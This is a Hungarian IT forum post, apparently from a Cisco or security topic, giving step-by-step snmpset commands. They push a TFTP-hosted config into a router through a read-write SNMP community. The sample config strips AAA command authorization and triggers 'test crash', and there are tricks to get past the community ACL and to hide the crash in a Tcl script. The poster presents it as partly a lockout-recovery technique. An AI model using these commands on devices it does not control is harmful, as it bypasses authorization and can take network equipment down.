Hirdetés
- Luck Dragon: Asszociációs játék. :)
- Gurulunk, WAZE?!
- btz: Internet fejlesztés országosan!
- petipetya: Nagy chili topic. :)
- D1Rect: Nagy "hülyétkapokazapróktól" topik
- sziku69: Fűzzük össze a szavakat :)
- Sub-ZeRo: Euro Truck Simulator 2 & American Truck Simulator 1 (esetleg 2 majd, ha lesz) :)
- Lalikiraly: Kinek milyen setupja van?
- gban: Ingyen kellene, de tegnapra
- sparks: Az első 7 nap egy iPhone 17 Pro Max-szal
Hirdetés
(használd a CYBSEC25PH kuponkódot további 20 ezer ft kedvezményért!)
-
LOGOUT
--- Még az új vizsgarendszer előtti információk, majd frissítjük! ---
Gyakran ismételt kérdések
Olvasd el a cikkeket itt.
Új hozzászólás Aktív témák
-
crok
Topikgazda
válasz
zsolti.22 #11381 üzenetére
Van rá 2 SNMP OID is hogy arra utasítsd az eszközt hogy szedjen le egy file-t mondjuk egy TFTP szerverről és tolja be a configba.. a tartalma meg lehet az is, hogy a config módban ne legyen command auth aztán.. amit jónak látsz, mondjuk do test crash..
A file tartalma meg valami ilyesmi lehetne:
no aaa authorization commands 1 default group tacacs+ if-authenticated
no aaa authorization commands 15 default group tacacs+ if-authenticated
do test crash
C
8
end^-- igen.. ez az end legyen a végén, mert innen fogja tudni az eszköz hogy itt a konfig vége, egyébként meg tol majd egy syslogot hogy olyan file lett beletolva a konfigba aminek nem volt vége.
Vagy:
tclsh
puts [open "flash:usefulscamcommands.tcl" w+] {
test crash
}
tclquit
tclsh flash:usefulscamcommands.tcl
És már kapod is a menüt, nem jártál konfig módban se de nem is adtad ki a test crash-t. Utána töröld a flash:usefulpinging.tcl-t : DTFTP-ről így tudod rányomni a konfigot:
snmpset -v<SNMP_verzió> -c<RW_Community> <Cél_IP> 1.3.6.1.4.1.9.2.1.53.<TFTP_Szerver_IP> s "<File-név>"
Bolondíthatod azzal, hogy a routeren csinálsz egy filet, azt tftp szerverként elérhetővé teszed önmagán és saját magát kéred meg hogy saját magáról szedje le a file-t. Mivel általában a RW community egy ACL-el van védve így érdemes egy abba beleillő loopback-et létrehozni és csinálni egy static route-ot úgy hogy a cél (még ha saját magad is vagy) ezen a kamu loopback-en át legyen elérhető mert a router azt az IP-t teszi be a csomagba source-ként amelyik interface-en elhagyja a routert - jelesül így a kamu loopback-en keresztül.. esetleg csinálsz egy teszt RW community-t.. de ha egy alattad levő eszközből zártad ki magad és át kén'írni a konfigját.. akkor ez még jól jöhet ( :tclsh
puts [open "flash:valami.tcl" w+] {
do test crash
C
8
! vagy tegyél ide amit jónak látsz, egy baró kis timeout 0-s pinget órákig..
end
}
tclquit
conf t
tftp-server flash:valami.tcl
snmp-server manager
do snmp set v2c <Egy IP saját magadról> <RW_Community> oid 1.3.6.1.4.1.9.2.1.53.<Ismét saját magad IP-je> s "valami.tcl"De távolról, egy jump szerverről is utasíthatod amúgy..
Ezekkel meg csinálhatsz egy konfig copy session-t, SNMP RW kell, részletesen beállíthatsz mindent:
A legvégén itt a 99 az a copy session táblabejegyzés száma, lehet kvázi bármi csak legyen mindenhol természetesen ugyan az:
ccCopyProtocol
snmpset -v2c -c <RW_Community> <Cél_IP-je> 1.3.6.1.4.1.9.9.96.1.1.1.1.2.99 i 1
1 tftp
2 ftp
3 rcp
4 scp
5 sftpccCopySourceFileType
snmpset -v2c -c <RW_Community> <Cél_IP-je> 1.3.6.1.4.1.9.9.96.1.1.1.1.3.99 i 1
1 networkFile
2 iosFile
3 startupConfig
4 runningConfigccCopyDestFileType
snmpset -v2c -c <RW_Community> <Cél_IP-je> 1.3.6.1.4.1.9.9.96.1.1.1.1.4.99 i 3
1 networkFile
2 iosFile
3 startupConfig
4 runningConfig
5 terminalccCopyServerAddress
snmpset -v2c -c <RW_Community> <Cél_IP-je> 1.3.6.1.4.1.9.9.96.1.1.1.1.5.99 a <Szerver IP>ccCopyFileName
snmpset -v2c -c <RW_Community> <Cél_IP-je> 1.3.6.1.4.1.9.9.96.1.1.1.1.6.99 s <path ha kell és a konfig file neve>ccCopyUserName
snmpset -v2c -c <RW_Community> <Cél_IP-je> 1.3.6.1.4.1.9.9.96.1.1.1.1.7.99 s <ha kell akkor username>ccCopyUserPassword
snmpset -v2c -c <RW_Community> <Cél_IP-je> 1.3.6.1.4.1.9.9.96.1.1.1.1.8.99 s <ha kell akkor password>ccCopyEntryRowStatus - itt egyre állítva elindítod a dolgot
snmpset -v2c -c <RW_Community> <Cél_IP-je> 1.3.6.1.4.1.9.9.96.1.1.1.1.14.99 i 1
1 active
2 notInService
3 notReady
4 createAndGo
5 createAndWait
6 destroyccCopyState - ezzel tudod lekérni a státuszt:
snmpwalk -v2c -c <RW_Community> <Cél_IP-je> .1.3.6.1.4.1.9.9.96.1.1.1.1.10.99
1 waiting
2 running
3 successful
4 failedConfigCopyFailCause - ezzel tudod lekérni hogy mi történt, felsorolja a legutóbbiakat, talán a .1.13.99 lekéri a 99-est?
snmpwalk -v2c -c <RW_Community> <Cél_IP-je> 1.3.6.1.4.1.9.9.96.1.1.1.1.13
1 unknown
2 badFileName
3 timeout
4 noMem
5 noConfig
6 unsupportedProtocol
7 someConfigApplyFailed
8 systemNotReady
9 requestAbortedMég lenne ötletem ha nem lennék pitsafáradt : D
És igen, azért részletes mert igen, volt már rá szükség..
Új hozzászólás Aktív témák
- Kérlek használd a keresőt, mielőtt kérdezel!
- Olvasd el a téma összefoglalót mielőtt kérdezel!
- A dumpok és a warez tiltott témának számítanak!
- Luck Dragon: Asszociációs játék. :)
- Gitáros topic
- One otthoni szolgáltatások (TV, internet, telefon)
- Azonnali informatikai kérdések órája
- TCL LCD és LED TV-k
- PlayStation 5
- Melyik tápegységet vegyem?
- Építő/felújító topik
- Így tör borsot a Samsung az Apple Vision Pro orra alá
- Kínai tulajdonban sem változtat nevet a MediaMarkt
- További aktív témák...
- 200 ezerrel ár alatt! A széria királya! A legmaxosabb 5080! Asus rog astral !
- ESZMÉLETLEN JÓ ÁRON MINDEN VAN! Amit csak szeretnél írd meg, szinte biztos hogy van! GARIS ÚJ cuccok
- AMILYEN GAMER PC-t AKARSZ AZT ÉN ÁR ALATT ÖSSZERAKOM NEKED! TELEVAGYOK KOMPONENSEKKEL! ÍRJ BÁTRAN!
- AMILYEN GAMER PC-t AKARSZ AZT ÉN ÁR ALATT ÖSSZERAKOM NEKED! TELEVAGYOK KOMPONENSEKKEL! ÍRJ BÁTRAN!
- KONKRÉTAN FÉLÁRON! Új GARANCIÁS ASUS ROG MAXIMUS Z890 EXTREME
- LG 32GS95UE - 32" OLED / UHD 4K / 240Hz - 480Hz & 0.03ms / 1300 Nits / NVIDIA G-Sync / AMD FreeSync
- ÚJ Dell Latitude 15 5550 - 15.6"FullHD IPS - Ultra 5 135U - 16GB - 512GB SSD - Win11 - 2,5+ év gari
- iKing.Hu - Apple iPhone 15 Pro Max Natural Titanium Titán dizájn, 5 optikai zoom 256 GB- Gari
- Sony MHC-V43D Aktív hangfal, party hangszóró
- Dell Latitude 7410 karbon i7 10610U, 16GB RAM, SSD, jó akku, számla, 6 hó gar
Állásajánlatok
Cég: Laptopműhely Bt.
Város: Budapest
Cég: PCMENTOR SZERVIZ KFT.
Város: Budapest